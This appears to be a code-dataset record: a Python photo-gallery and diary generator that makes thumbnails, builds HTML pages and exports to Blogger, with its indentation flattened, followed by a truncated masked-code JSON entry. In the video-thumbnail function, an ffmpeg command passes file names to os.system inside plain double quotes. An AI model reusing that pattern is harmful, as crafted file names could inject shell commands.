PxqDcH6p1swXBC4l6yZskACkTN1WrQr2SlIFhTtgqeZa+zsOogLXegvEocZ5c/W5BcoVNNCg3hSudV
/hEh4ofw6cEb00Km8i0dpRDUXfKiaQOEAdrUDo4dFp9C33jjaRac9/gDF/AlplVYtfWGCjAAAAAElF
TkSuQmCC'''
def create_thumbnail_video(args, filename, thumbname, size, duration):
# ffmpeg must be in path
delay = min(duration - 1, args.thumbnails.thumbdelay)
sizearg = '%dx%d' % size
command = 'ffmpeg -y -v error -itsoffset -%d -i "%s" -vcodec mjpeg -vframes 1 -an -f rawvideo -s %s "%s"'
command = command % (delay, filename, sizearg, thumbname)
result = os.system(command)
# add a movie icon to the thumbnail to identify videos
try:
img1 = Image.open(thumbname)
except:
# ffmpeg was unable to save thumbnail
warning('Unable to save thumbnail for', filename)
return
img2 = Image.open(io.BytesIO(base64.b64decode(VIDEO_ICON)))
width, height = img1.size
img1.paste(img2, (6, height - 20 - 6), None)
img1.save(thumbname)
def make_thumbnail_subdir(args, subdir_name, thumb_name, size, items, thumbdir):
# subdir thumbnails are always created as they depend on the content of the
# directory
print('Making thumbnail:', thumb_name)
create_thumbnail_subdir(subdir_name, thumb_name, size, items, thumbdir)
def create_thumbnail_subdir(subdir_name, thumb_name, size, items, thumbdir):
def size_thumbnail(width, height, xmax, ymax):
width2 = xmax
height2 = int(round(xmax * height / width))
if height2 < ymax:
width2 = int(round(ymax * width / height))
height2 = ymax
return width2, height2
thumblist = [os.path.basename(item.thumb) for item in items]
widthnum, heightnum, width, height, offsetx, offsety = mosaic_geometry(size, thumblist)
thumbnum = widthnum * heightnum
img = Image.new('RGB', size, SUBDIR_BACKCOL)
for ind, thumb in enumerate(thumblist[:min(thumbnum, len(thumblist))]):
row = ind // widthnum
col = ind % widthnum
img2 = Image.open(os.path.join(thumbdir, thumb))
w, h = size_thumbnail(*img2.size, width[col], height[row])
cropdim = ((w - width[col]) // 2, (h - height[row]) // 2,
(w - width[col]) // 2 + width[col], (h - height[row]) // 2 + height[row])
img2 = img2.resize((w, h), Image.LANCZOS)
img2 = img2.crop(cropdim)
img.paste(img2, (offsetx[col], offsety[row]))
if os.path.exists(thumb_name):
# test if the generated thumbnail is identical to the one already on disk
imgref = Image.open(thumb_name)
# must save and reload before comparing
byteio = io.BytesIO()
img.save(byteio, "JPEG")
byteio.seek(0)
imgnew = Image.open(byteio)
diff = ImageChops.difference(imgnew, imgref)
if diff.getbbox() is None:
return
img.save(thumb_name)
def mosaic_geometry(size, thumblist):
if len(thumblist) == 1:
widthnum = 1
heightnum = 1
elif len(thumblist) <= 3:
widthnum = 1
heightnum = 2
elif len(thumblist) <= 8:
widthnum = 2
heightnum = 2
else:
widthnum = 3
heightnum = 3
if widthnum == 1:
width = [size[0] - 2]
else:
width = [size[0] // widthnum - 2] * (widthnum - 1)
width.append(size[0] - (1 + sum(width) + 2 * len(width) + 1))
if heightnum == 1:
height = [size[1] - 2]
else:
height = [size[1] // heightnum - 2] * (heightnum - 1)
height.append(size[1] - (1 + sum(height) + 2 * len(height) + 1))
offsetx = [1]
for w in width[:-1]:
offsetx.append(offsetx[-1] + w + 2)
offsety = [1]
for h in height[:-1]:
offsety.append(offsety[-1] + h + 2)
return widthnum, heightnum, width, height, offsetx, offsety
def list_of_htmlfiles(args, posts):
htmlist = list()
htmlist.append(os.path.join(args.dest, args.rootname))
for post in posts:
htmlist.extend(list_of_htmlfiles_in_items(post.dcim))
return htmlist
def list_of_htmlfiles_in_items(itemlist):
htmlist = list()
for item in itemlist:
if type(item) == PostSubdir:
htmlist.append(item.htmname)
htmlist.extend(list_of_htmlfiles_in_items(item.sublist))
return htmlist
def list_of_thumbnails(posts, diary=False):
thumblist = list()
for post in posts:
thumblist.extend(list_of_thumbnails_in_items(post.medias))
if diary is False:
thumblist.extend(list_of_thumbnails_in_items(post.dcim))
return thumblist
def list_of_thumbnails_in_items(itemlist):
thumblist = list()
for item in itemlist:
if type(item) == PostSubdir:
thumblist.append(os.path.basename(item.thumb))
thumblist.extend(list_of_thumbnails_in_items(item.sublist))
else:
thumblist.append(os.path.basename(item.thumb))
return thumblist
def purge_htmlfiles(args, posts):
"""
Purge root dir from irrelevant html files
"""
htmlist = list_of_htmlfiles(args, posts)
html_to_remove = list()
for fullname in glob.glob(os.path.join(args.root, '*.htm*')):
if fullname not in htmlist:
html_to_remove.append(fullname)
if len(html_to_remove) > args.thumbnails.threshold_htmlfiles:
inpt = 'x'
while inpt not in 'yn':
inpt = input(f'{len(html_to_remove)} html files to remove. Continue [y|n]? ').lower()
if inpt == 'n':
return
for name in html_to_remove:
print('Removing html files', name)
os.remove(name)
def purge_thumbnails(args, thumbdir, posts, diary=False):
"""
Purge thumbnail dir from irrelevant thumbnails
"""
thumblist = list_of_thumbnails(posts, diary)
thumbs_to_remove = list()
for fullname in glob.glob(os.path.join(thumbdir, '*.jpg')):
if os.path.basename(fullname) not in thumblist:
thumbs_to_remove.append(fullname)
if len(thumbs_to_remove) > args.thumbnails.threshold_thumbs:
inpt = 'x'
while inpt not in 'yn':
inpt = input(f'{len(thumbs_to_remove)} thumbnails to remove. Continue [y|n]? ').lower()
if inpt == 'n':
return
for name in thumbs_to_remove:
print('Removing thumbnail', name)
os.remove(name)
info_fullname = os.path.splitext(name)[0] + '.info'
if os.path.exists(info_fullname):
os.remove(info_fullname)
# -- List of medias helpers ---------------------------------------------------
def is_media_within_dates(fullname, dates):
if is_media(fullname):
if type(dates) == tuple:
return dates[0] <= date_from_item(fullname) <= dates[1]
else:
return True
else:
return False
def sorted_listdir(filelist):
like_windows_explorer = True
if not filelist:
return filelist
if like_windows_explorer:
maxlen = max(len(os.path.splitext(name)[0]) for name in filelist)
def keyfunc(name):
root, ext = os.path.splitext(name.lower())
return root.ljust(maxlen, ' ') + ext
else:
keyfunc = str.lower
return sorted(filelist, key=keyfunc)
def list_of_files(sourcedir, recursive):
"""
Return the list of full paths for files in source directory
"""
result = list()
if recursive is False:
listdir = sorted_listdir(os.listdir(sourcedir))
if '.nomedia' not in listdir:
for basename in listdir:
result.append(os.path.join(sourcedir, basename))
else:
for root, dirs, files in os.walk(sourcedir):
if '.nomedia' not in files:
for basename in sorted_listdir(files):
result.append(os.path.join(root, basename))
return result
def list_of_medias(args, sourcedir, recursive):
"""
Return the list of full paths for pictures and movies in source directory
"""
files = list_of_files(sourcedir, recursive)
return [_ for _ in files if is_media_within_dates(_, args.dates)]
def list_of_medias_ext(args, sourcedir):
"""
Return the list of full paths for pictures and movies in source directory
plus subdirectories containing media
"""
result = list()
listdir = sorted_listdir(os.listdir(sourcedir))
if '.nomedia' not in listdir:
for basename in listdir:
fullname = os.path.join(sourcedir, basename)
if os.path.isdir(fullname) and basename != '$RECYCLE.BIN' and contains_media(args, fullname):
result.append(fullname)
else:
if is_media_within_dates(fullname, args.dates):
result.append(fullname)
return result
def contains_media(args, dirname):
for root, dirs, files in os.walk(dirname):
if '.nomedia' not in files:
for basename in files:
if is_media_within_dates(os.path.join(root, basename), args.dates):
return True
else:
return False
def dispatch_post_items(list_of_post_items):
subdirs = [_ for _ in list_of_post_items if type(_) is PostSubdir]
medias = [_ for _ in list_of_post_items if type(_) is not PostSubdir]
return subdirs, medias
# -- Creation of gallery element ----------------------------------------------
def create_item(args, media_fullname, sourcedir, thumbdir, key, thumbmax):
if os.path.isfile(media_fullname):
if is_image_file(media_fullname):
return create_item_image(args, media_fullname, sourcedir, thumbdir, key, thumbmax)
else:
return create_item_video(args, media_fullname, sourcedir, thumbdir, key, thumbmax)
else:
return create_item_subdir(args, media_fullname, sourcedir, thumbdir, key, thumbmax)
def create_item_image(args, media_fullname, sourcedir, thumbdir, key, thumbmax):
media_basename = os.path.basename(media_fullname)
media_relname = relative_name(media_fullname, sourcedir)
thumb_basename = thumbname(media_relname, key)
thumb_fullname = os.path.join(thumbdir, thumb_basename)
try:
info, infofmt = get_image_info(media_fullname)
infofmt = media_basename + ': ' + infofmt
thumbsize = size_thumbnail(info[2], info[3], thumbmax)
make_thumbnail_image(args, media_fullname, thumb_fullname, thumbsize)
return PostImage(None, media_fullname, '/'.join((args.thumbrep, thumb_basename)),
thumbsize, infofmt)
except PIL.UnidentifiedImageError:
# corrupted image
warning('Unable to read image', media_fullname)
return None
def create_item_video(args, media_fullname, sourcedir, thumbdir, key, thumbmax):
media_basename = os.path.basename(media_fullname)
media_relname = relative_name(media_fullname, sourcedir)
thumb_basename = thumbname(media_relname, key)
thumb_fullname = os.path.join(thumbdir, thumb_basename)
info_fullname = os.path.splitext(thumb_fullname)[0] + '.info'
try:
info, infofmt = get_video_info(media_fullname, info_fullname)
infofmt = media_basename + ': ' + infofmt
thumbsize = size_thumbnail(info[2], info[3], thumbmax)
make_thumbnail_video(args, media_fullname, thumb_fullname, thumbsize, duration=info[5])
return PostVideo(None, media_fullname, '/'.join((args.thumbrep, thumb_basename)),
thumbsize, infofmt)
except CalledProcessError:
# corrupted video
warning('Unable to read video', media_fullname)
return None
def create_item_subdir(args, media_fullname, sourcedir, thumbdir, key, thumbmax):
media_basename = os.path.basename(media_fullname)
media_relname = relative_name(media_fullname, sourcedir)
thumb_basename = thumbname(media_relname, key)
thumb_fullname = os.path.join(thumbdir, thumb_basename)
info, infofmt = None, None
thumbsize = (thumbmax, int(round(thumbmax / 640 * 480)))
medias_ext = list_of_medias_ext(args, media_fullname)
if not medias_ext:
return None
item = PostSubdir(None, media_fullname, '/'.join((args.thumbrep, thumb_basename)),
thumbsize, infofmt)
item.htmname = os.path.join(os.path.dirname(thumbdir), media_relname + args.html_suffix)
if args.thumbnails.subdir_caption:
item.caption = media_basename
else:
item.caption = ''
_, posts = make_posts(args, media_fullname)
item.posts = posts
items = [item for post in posts for item in post.dcim]
item.sublist = items
make_thumbnail_subdir(args, media_fullname, thumb_fullname, thumbsize, items, thumbdir)
return item
def relative_name(media_fullname, sourcedir):
"""
/Gilles/Dev/journal/tests/subdir/deeper2/deepest/OCT_20000112_000004.jpg
-->
deeper2_deepest_OCT_20000112_000004.jpg
/Gilles/Dev/journal/tests/subdir/deeper2/deepest
-->
deeper2_deepest
"""
x = os.path.relpath(media_fullname, sourcedir)
x = x.replace('\\', '_').replace('/', '_').replace('#', '_')
return x
# -- Creation of posts --------------------------------------------------------
def make_posts(args, dirname):
if args.diary is True:
if not args.sourcedir:
return make_posts_from_diary(args)
else:
return make_posts_from_diary_and_dir(args)
elif args.bydate is False:
return make_posts_from_subdir(args, dirname)
else:
return make_posts_from_subdir_and_date(args, dirname)
def make_posts_from_diary(args):
md_filename = os.path.join(args.root, 'index.md')
if os.path.exists(md_filename):
title, posts = parse_markdown(md_filename)
else:
error('File not found', md_filename)
for post in posts:
for media in post.medias:
media_fullname = os.path.join(args.root, media.uri)
item = create_item(args, media_fullname, args.root, args.thumbdir, 'post', 400)
media.thumb = item.thumb
media.thumbsize = item.thumbsize
media.descr = item.descr
return title, posts
def create_items_by_date(args, medias, posts):
# list of required dates
if args.dates == 'diary':
required_dates = {post.date for post in posts}
else:
required_dates = {date_from_item(media) for media in medias}
if type(args.dates) == tuple:
date1, date2 = args.dates
required_dates = {date for date in required_dates if date1 <= date <= date2}
bydate = defaultdict(list)
for media_fullname in medias:
date = date_from_item(media_fullname)
if date in required_dates:
item = create_item(args, media_fullname, args.sourcedir, args.thumbdir, 'dcim', 300)
if item:
bydate[date].append(item)
for date, liste in bydate.items():
liste.sort(key=lambda item: time_from_item(item.uri))
return bydate
def make_posts_from_diary_and_dir(args):
title, posts = make_posts_from_diary(args)
# list of all pictures and movies
medias = list_of_medias(args, args.sourcedir, args.recursive)
bydate = create_items_by_date(args, medias, posts)
# make list of extra dates (not in posts)
extradates = set(bydate) - {post.date for post in posts}
# complete posts with extra dates
for date in extradates:
post = Post.from_date(date)
post.extra = True
bisect.insort(posts, post)
# several posts can have the same date, only the first one is completed with dcim medias
for post in posts:
if post.date in bydate and post.daterank == 1:
post.dcim = bydate[post.date]
return title, posts
def make_posts_from_subdir(args, dirname):
# list of pictures and movies plus subdirectories
if args.bydir is False:
medias_ext = list_of_medias(args, dirname, args.recursive)
else:
medias_ext = list_of_medias_ext(args, dirname)
#required_dates = get_required_dates(args, medias_ext, posts=None)
#medias_ext_bis = []
#for media in medias_ext:
# if complies_with_required_dates(media):
# medias_ext_bis.append(media)
# complete posts
postmedias = list()
for item in medias_ext:
postmedia = create_item(args, item, args.sourcedir, args.thumbdir, 'dcim', 300)
if postmedia is not None:
postmedias.append(postmedia)
post = Post(date='00000000', text='', medias=[])
post.dcim = postmedias
posts = [post]
title = os.path.basename(args.sourcedir) or os.path.splitdrive(args.sourcedir)[0]
return title, posts
def make_posts_from_subdir_and_date(args, dirname):
# list of all pictures and movies
if args.bydir is False:
medias = list_of_medias(args, dirname, args.recursive)
subdirs = []
else:
medias_ext = list_of_medias_ext(args, dirname)
medias = [_ for _ in medias_ext if is_media(_)]
subdirs = [_ for _ in medias_ext if not is_media(_)]
# create list of posts with a single post containing all subdirs
posts = list()
items = list()
for media_fullname in subdirs:
item = create_item(args, media_fullname, args.sourcedir, args.thumbdir, 'dcim', 300)
if item:
items.append(item)
if items:
post = Post(date='00000000', text='', medias=[])
post.dcim = items
posts.append(post)
bydate = create_items_by_date(args, medias, posts)
# add dates
for date in sorted(bydate):
post = Post.from_date(date)
post.dcim = bydate[post.date]
posts.append(post)
title = os.path.basename(args.sourcedir) or os.path.splitdrive(args.sourcedir)[0]
return title, posts
# -- Creation of html page from directory tree --------------------------------
def create_gallery(args):
title, posts = make_posts(args, args.sourcedir)
print_html(args, posts, title, os.path.join(args.dest, args.rootname), 'regular')
purge_htmlfiles(args, posts)
if args.diary and not args.sourcedir:
purge_thumbnails(args, args.thumbdir, posts, diary=True)
else:
purge_thumbnails(args, args.thumbdir, posts)
# -- Creation of diary from medias --------------------------------------------
def create_diary(args):
# list of all pictures and movies
medias = list_of_medias(args, args.sourcedir, args.recursive)
# list of required dates
if args.dates == 'diary':
assert 0
else:
required_dates = {date_from_item(media) for media in medias}
if type(args.dates) == tuple:
date1, date2 = args.dates
required_dates = {date for date in required_dates if date1 <= date <= date2}
title = args.sourcedir
posts = list()
for date in sorted(required_dates):
posts.append(Post.from_date(date))
os.makedirs(args.root, exist_ok=True)
print_markdown(posts, title, os.path.join(args.root, 'index.md'))
# -- Export to blogger---------------------------------------------------------
def online_images_url(args):
try:
if args.urlblogger.startswith('http:') or args.urlblogger.startswith('https:'):
with urlopen(args.urlblogger) as u:
buffer = u.read()
else:
with open(args.urlblogger, 'rb') as f:
buffer = f.read()
except:
error('Unable to read url', args.urlblogger)
buffer = buffer.decode('utf-8')
online_images = dict()
for match in re.finditer('<div class="separator"((?!<div).)*?</div>', buffer, flags=re.DOTALL):
div_separator = match.group(0)
div_separator = div_separator.replace(' ', '')
elem_div = objectify.fromstring(div_separator)
for elem_a in elem_div.iterchildren(tag='a'):
href = elem_a.get("href")
thumb = elem_a.img.get("src")
online_images[os.path.basename(href)] = (href, thumb)
# video insertion relies only on video order
online_videos = list()
for match in re.finditer('<iframe allowfullscreen="allowfullscreen".*?</iframe>', buffer, flags=re.DOTALL):
iframe = match.group(0)
online_videos.append(iframe)
return online_images, online_videos
def compare_image_buffers(imgbuf1, imgbuf2):
"""
return True if images read on file are identical, False otherwise
"""
with io.BytesIO(imgbuf1) as imgio1, io.BytesIO(imgbuf2) as imgio2:
img1 = Image.open(imgio1)
img2 = Image.open(imgio2)
diff = ImageChops.difference(img1, img2)
return not diff.getbbox()
def check_images(args, posts, online_images):
result = True
for post in posts:
for media in post.medias:
if type(media) is PostImage:
if media.basename in online_images:
with open(os.path.join(args.root, media.uri), 'rb') as f:
imgbuf1 = f.read()
try:
with urlopen(online_images[media.basename][0]) as u:
imgbuf2 = u.read()
except FileNotFoundError:
print('File not found', online_images[media.basename][0])
next
if compare_image_buffers(imgbuf1, imgbuf2) is False:
print('Files are different, upload', media.basename)
else:
if 1:
print('File already online', media.basename)
else:
print('File is absent, upload', media.basename)
result = False
elif type(media) is PostVideo:
# no check for the moment
print('Video not checked', media.basename)
else:
assert False
return result
def compose_blogger_html(args, title, posts, imgdata, online_videos):
""" Compose html with blogger image urls
"""
for post in posts:
for media in post.medias:
if type(media) is PostImage:
if media.uri not in imgdata:
print('Image missing: ', media.uri)
else:
img_url, resized_url = imgdata[media.uri]
media.uri = img_url
media.resized_url = resized_url
elif type(media) is PostVideo:
if not online_videos:
print('Video missing: ', media.uri)
else:
media.iframe = online_videos[0]
del online_videos[0]
else:
assert False
return print_html(args, posts, title, '', target='blogger')
def prepare_for_blogger(args):
"""
Export blogger html to clipboard.
If --full, export complete html, otherwise export html extract ready to
paste into blogger edit mode.
"""
title, posts = parse_markdown(os.path.join(args.root, 'index.md'))
online_images, online_videos = online_images_url(args)
if args.check_images and check_images(args, posts, online_images) is False:
pass
html = compose_blogger_html(args, title, posts, online_images, online_videos)
if args.full is False:
html = re.search('<body>(.*)?</body>', html, flags=re.DOTALL).group(1)
html = re.sub('<script>.*?</script>', '', html, flags=re.DOTALL)
html = STYLE.replace('%%', '%') + html
if args.dest:
with open(args.dest, 'wt', encoding='utf-8') as f:
f.write(html)
else:
clipboard.copy(html)
# -- Other commands -----------------------------------------------------------
def idempotence(args):
"""
For testing identity between a diary file and the fle obtained after reading
and printing it. See testing.
"""
title, posts = parse_markdown(os.path.join(args.root, 'index.md'))
print_markdown(posts, title, os.path.join(args.dest, 'index.md'))
# -- Configuration file ------------------------------------------------------
# The following docstring is used to create the configuration file.
CONFIG_DEFAULTS = """\
[source]
; source directory
; value: valid path
sourcedir = .
; one web page per directory
; value: true or false
bydir = false
; dispatch medias by dates
; value: true or false
bydate = false
; include text and medias from diary file
; value: true or false
diary = false
; include subdirectories recursively (used when bydir is false)
; value: true or false
recursive = false
; interval of dates to include
; value: source|diary|yyyymmdd-yyyymmdd or empty (= source)
dates =
; github Pages compatibility (.htlml extension and no dot in directory names)
; value: true or false
github_pages = false
[thumbnails]
; specifies whether or not the gallery displays media description (size, dimension, etc)
; value: true or false
media_description = true
; specifies whether subdir captions are empty or the name of the subdir
; value: true or false
subdir_caption = true
; timestamp of thumbnail in video
; value: number of seconds
thumbdelay = 5
; maximum number of thumbnails to remove without user confirmation
; value: integer
threshold_thumbs = 10
[photobox]
; Allows to navigate between first and last images
; value: true or false
loop = false
; Show gallery thumbnails below the presented photo
; value: true or false
thumbs = true
; Should autoplay on first time or not
; value: true or false
autoplay = false
; Autoplay interval (less than 1000 will hide the autoplay button)
; value: milliseconds
time = 3000
; Disable/enable mousewheel image zooming
; value: true or false
zoomable = true
; Allow rotation of the image
; value: true or false
rotatable = true
; Change image using mousewheel left/right
; value: true or false
wheelNextPrev = true
"""
class MyConfigParser (ConfigParser):
"""Add input checking."""
def __init__(self):
ConfigParser.__init__(self, inline_comment_prefixes=(';',))
def error(self, section, entry):
error('Missing or incorrect config value:', '[%s]%s' % (section, entry))
def getint(self, section, entry, default=None):
try:
if default is None:
return ConfigParser.getint(self, section, entry)
else:
return ConfigParser.getint(self, section, entry, raw=True, vars=None, fallback=default)
except Exception as e:
print(e)
self.error(section, entry)
def getboolean(self, section, entry, default=None):
try:
if default is None:
return ConfigParser.getboolean(self, section, entry)
else:
return ConfigParser.getboolean(self, section, entry, raw=True, vars=None, fallback=default)
except Exception as e:
print(e)
self.error(section, entry)
def configfilename(params):
return os.path.join(params.root, '.config.ini')
def createconfig(config_filename):
with open(config_filename, 'wt') as f:
f.writelines(CONFIG_DEFAULTS)
def read_config(params):
config_filename = configfilename(params)
try:
if not os.path.exists(config_filename) or params.resetcfg:
createconfig(config_filename)
except:
error('Error creating configuration file')
try:
getconfig(params, config_filename)
except Exception as e:
error('Error reading configuration file.', str(e), 'Use --resetcfg')
def getconfig(options, config_filename):
class Section:
pass
options.source = Section()
options.thumbnails = Section()
options.photobox = Section()
config = MyConfigParser()
config.read(config_filename)
# [source]
options.source.sourcedir = config.get('source', 'sourcedir')
options.source.bydir = config.getboolean('source', 'bydir')
options.source.bydate = config.getboolean('source', 'bydate')
options.source.diary = config.getboolean('source', 'diary')
options.source.recursive = config.getboolean('source', 'recursive')
options.source.dates = config.get('source', 'dates')
options.source.github_pages = config.getboolean('source', 'github_pages', default=False)
# [thumbnails]
options.thumbnails.media_description = config.getboolean('thumbnails', 'media_description')
options.thumbnails.subdir_caption = config.getboolean('thumbnails', 'subdir_caption')
options.thumbnails.thumbdelay = config.getint('thumbnails', 'thumbdelay')
options.thumbnails.threshold_thumbs = config.getint('thumbnails', 'threshold_thumbs')
options.thumbnails.threshold_htmlfiles = config.getint('thumbnails', 'threshold_htmlfiles', default=3)
# [photobox]
options.photobox.loop = config.getboolean('photobox', 'loop')
options.photobox.thumbs = config.getboolean('photobox', 'thumbs')
options.photobox.autoplay = config.getboolean('photobox', 'autoplay')
options.photobox.time = config.getint('photobox', 'time')
options.photobox.zoomable = config.getboolean('photobox', 'zoomable')
options.photobox.rotatable = config.getboolean('photobox', 'rotatable')
options.photobox.wheelNextPrev = config.getboolean('photobox', 'wheelNextPrev')
def setconfig(cfgname, section, key, value):
config = MyConfigParser()
config.read(cfgname)
config.set(section, key, value)
with open(cfgname, 'wt') as configfile:
config.write(configfile)
def setconfig_cmd(args):
config_filename = configfilename(args)
setconfig(config_filename, *args.setcfg)
def update_config(args):
# update only entries which can be modified from the command line (source section)
updates = (
('sourcedir', args.sourcedir),
('bydir', BOOL[args.bydir]),
('bydate', BOOL[args.bydate]),
('diary', BOOL[args.diary]),
('recursive', BOOL[args.recursive]),
('dates', args.dates),
('github_pages', BOOL[args.github_pages]),
)
# manual update to keep comments
cfgname = configfilename(args)
with open(cfgname) as f:
cfglines = [_.strip() for _ in f.readlines()]
for key, value in updates:
for iline, line in enumerate(cfglines):
if line.startswith(key):
cfglines[iline] = f'{key} = {value}'
break
with open(cfgname, 'wt') as f:
for line in cfglines:
print(line, file=f)
# -- Error handling -----------------------------------------------------------
def warning(*msg):
print(colorama.Fore.YELLOW + colorama.Style.BRIGHT +
' '.join(msg),
colorama.Style.RESET_ALL)
# Every error message error must be declared here to give a return code to the error
ERRORS = '''\
File not found
Directory not found
No date in post
Incorrect date value:
Posts are not ordered
Unable to read url
No image source (--sourcedir)
No blogger url (--url)
Missing or incorrect config value:
Error creating configuration file
Error reading configuration file.
Incorrect date format
Incorrect parameters:
'''
def errorcode(msg):
return ERRORS.splitlines().index(msg) + 1
def error(*msg):
print(colorama.Fore.RED + colorama.Style.BRIGHT +
' '.join(msg),
colorama.Style.RESET_ALL)
sys.exit(errorcode(msg[0]))
# -- Main ---------------------------------------------------------------------
BOOL = ('false', 'true')
def parse_command_line(argstring):
parser = argparse.ArgumentParser(description=None, usage=USAGE)
agroup = parser.add_argument_group('Commands')
xgroup = agroup.add_mutually_exclusive_group()
xgroup.add_argument('--gallery', help='source in --sourcedir',
action='store', metavar='<root-dir>')
agroup.add_argument('--update', help='updates gallery with parameters in config file',
action='store', metavar='<root-dir>')
xgroup.add_argument('--create', help='create journal from medias in --sourcedir',
action='store', metavar='<root-dir>')
# testing
xgroup.add_argument('--resetcfg', help='reset config file to defaults',
action='store', metavar='<root-dir>')
xgroup.add_argument('--setcfg', help=argparse.SUPPRESS,
action='store', nargs=4, metavar='<root-dir>')
xgroup.add_argument('--idem', help=argparse.SUPPRESS,
action='store', metavar='<root-dir>')
# blogger
xgroup.add_argument('--blogger',
help='input md, html blogger ready in clipboard',
action='store', metavar='<root-dir>')
agroup = parser.add_argument_group('Parameters')
agroup.add_argument('--bydir', help='organize gallery by subdirectory',
action='store', default=None, choices=BOOL)
agroup.add_argument('--bydate', help='organize gallery by date',
action='store', default=None, choices=BOOL)
agroup.add_argument('--diary', help='organize gallery using markdown file diary',
action='store', default=None, choices=BOOL)
agroup.add_argument('--recursive', help='--sourcedir scans recursively',
action='store', default=None, choices=BOOL)
agroup.add_argument('--dates', help='dates interval',
action='store', default=None)
agroup.add_argument('--sourcedir', help='media directory',
action='store', default=None)
agroup.add_argument('--github_pages', help='github Pages compatibility',
action='store', default=None, choices=BOOL)
agroup.add_argument('--dest', help='output directory',
action='store')
agroup.add_argument('--forcethumb', help='force calculation of thumbnails',
action='store_true', default=False)
agroup.add_argument('--full', help='full html (versus blogger ready html)',
action='store_true', default=False)
agroup.add_argument('--check', dest='check_images', help='check availability of medias on blogger',
action='store_true')
agroup.add_argument('--url', dest='urlblogger', help='blogger post url',
action='store')
if argstring is None:
print('Type "galerie -h" for help')
sys.exit(1)
else:
args = parser.parse_args(argstring.split())
if args.update and (args.bydir or args.bydate or args.diary or args.sourcedir or
args.recursive or args.dates or args.github_pages):
error('Incorrect parameters:',
'--update cannot be used with creation parameters, use explicit command')
args.bydir = args.bydir == 'true'
args.bydate = args.bydate == 'true'
args.diary = args.diary == 'true'
args.recursive = args.recursive == 'true'
args.dates = 'source' if (args.dates is None) else args.dates
args.github_pages = args.github_pages == 'true'
args.root = (
args.create or args.gallery or args.update
or args.blogger or args.idem or args.resetcfg
)
if args.setcfg:
args.root = args.setcfg[0]
args.setcfg = args.setcfg[1:]
return args
def setup_part1(args):
"""
Made before reading config file (config file located in args.root).
Check and normalize root path.
"""
args.rootarg = args.root
rootext = os.path.splitext(args.rootarg)[1]
if rootext == '':
pass
else:
args.root = os.path.dirname(args.root)
if args.root:
args.root = os.path.abspath(args.root)
if not os.path.isdir(args.root):
if args.gallery:
os.mkdir(args.root)
else:
error('Directory not found', args.root)
def setup_part2(args):
"""
Made after reading config file.
Check for ffmpeg in path.
Create .thumbnails dir if necessary and create .nomedia in it.
Copy photobox file to destination dir.
Handle priority between command line and config file.
"""
if args.update:
args.sourcedir = args.source.sourcedir
args.bydir = args.source.bydir
args.bydate = args.source.bydate
args.diary = args.source.diary
args.recursive = args.source.recursive
args.dates = args.source.dates
args.github_pages = args.source.github_pages
elif args.gallery:
args.source.sourcedir = args.sourcedir
args.source.bydir = args.bydir
args.source.bydate = args.bydate
args.source.diary = args.diary
args.source.recursive = args.recursive
args.source.dates = args.dates
args.source.github_pages = args.github_pages
update_config(args)
if args.github_pages:
args.html_suffix = '.html'
else:
args.html_suffix = '.htm'
rootext = os.path.splitext(args.rootarg)[1]
if rootext:
args.rootname = os.path.basename(args.rootarg)
else:
args.rootname = 'index' + args.html_suffix
if args.sourcedir:
args.sourcedir = os.path.abspath(args.sourcedir)
if os.path.splitdrive(args.sourcedir)[0]:
drive, rest = os.path.splitdrive(args.sourcedir)
args.sourcedir = drive.upper() + rest
if not os.path.isdir(args.sourcedir):
error('Directory not found', args.sourcedir)
else:
if args.gallery and args.diary is False and args.update is None:
error('Directory not found', 'Use --sourcedir')
if args.dest:
args.dest = os.path.abspath(args.dest)
if args.dest is None:
args.dest = args.root
if args.blogger and args.urlblogger is None:
error('No blogger url (--url)')
if args.gallery or args.update:
# check for ffmpeg and ffprobe in path
for exe in ('ffmpeg', 'ffprobe'):
try:
check_output([exe, '-version'])
except FileNotFoundError:
error('File not found', exe)
if args.github_pages:
args.thumbrep = 'thumbnails'
else:
args.thumbrep = '.thumbnails'
args.thumbdir = os.path.join(args.dest, args.thumbrep)
if not os.path.exists(args.thumbdir):
os.mkdir(args.thumbdir)
open(os.path.join(args.thumbdir, '.nomedia'), 'a').close()
favicondst = os.path.join(args.dest, 'favicon.ico')
if not os.path.isfile(favicondst):
faviconsrc = os.path.join(os.path.dirname(__file__), 'favicon.ico')
shutil.copyfile(faviconsrc, favicondst)
photoboxdir = os.path.join(args.dest, 'photobox')
if not os.path.exists(photoboxdir):
photoboxsrc = os.path.join(os.path.dirname(__file__), 'photobox')
shutil.copytree(photoboxsrc, photoboxdir)
if args.dates:
if not(args.gallery or args.create):
# silently ignored for the moment, otherwise all other commands will
# launch a wanrning or an error on the default --dates value
pass
if args.dates == 'source':
pass
elif args.dates == 'diary':
if args.create:
error('Incorrect date format', args.dates)
elif re.match(r'\d+-\d+', args.dates):
date1, date2 = args.dates.split('-')
if validate_date(date1) and validate_date(date2):
args.dates = date1, date2
else:
error('Incorrect date format', args.dates)
else:
error('Incorrect date format', args.dates)
def main(argstring=None):
colorama.init()
args = parse_command_line(argstring)
setup_part1(args)
read_config(args)
setup_part2(args)
try:
if args.gallery or args.update:
create_gallery(args)
elif args.create:
create_diary(args)
elif args.blogger:
prepare_for_blogger(args)
elif args.idem:
idempotence(args)
elif args.setcfg:
setconfig_cmd(args)
except KeyboardInterrupt:
warning('Interrupted by user.')
if __name__ == '__main__':
main(' '.join(sys.argv[1:]))
|
normal
|
{
"blob_id": "6018f35afc6646d0302ca32de649ffe7d544a765",
"index": 3377,
"step-1": "<mask token>\n\n\nclass Post:\n\n def __init__(self, date, text, medias):\n self.date = date\n self.text = text\n self.medias = medias\n self.dcim = []\n self.daterank = 0\n self.extra = False\n\n def __lt__(self, other):\n return self.date < other.date\n\n @classmethod\n def from_markdown(cls, post):\n m = re.match('\\\\[(\\\\d\\\\d\\\\d\\\\d/\\\\d\\\\d/\\\\d\\\\d)\\\\]\\\\n*', post[0])\n if m:\n date = m.group(1).replace('/', '')\n if not validate_date(date):\n error('Incorrect date value:', date)\n del post[0]\n else:\n error('No date in post', ' '.join(post))\n while post and not post[0].strip():\n del post[0]\n text = ''\n while post and not re.match('!?\\\\[\\\\]', post[0]):\n text += post[0]\n del post[0]\n text = re.sub('\\\\n\\\\n$', '\\n', text)\n medias = list()\n while post and (match := re.match('!?\\\\[\\\\]\\\\((.*)\\\\)', post[0])):\n media = match.group(1)\n caption = None\n del post[0]\n if post and not re.match('!?\\\\[\\\\]', post[0]):\n caption = post[0].strip()\n del post[0]\n if match.group(0)[0] == '!':\n medias.append(PostImage(caption, media))\n else:\n medias.append(PostVideo(caption, 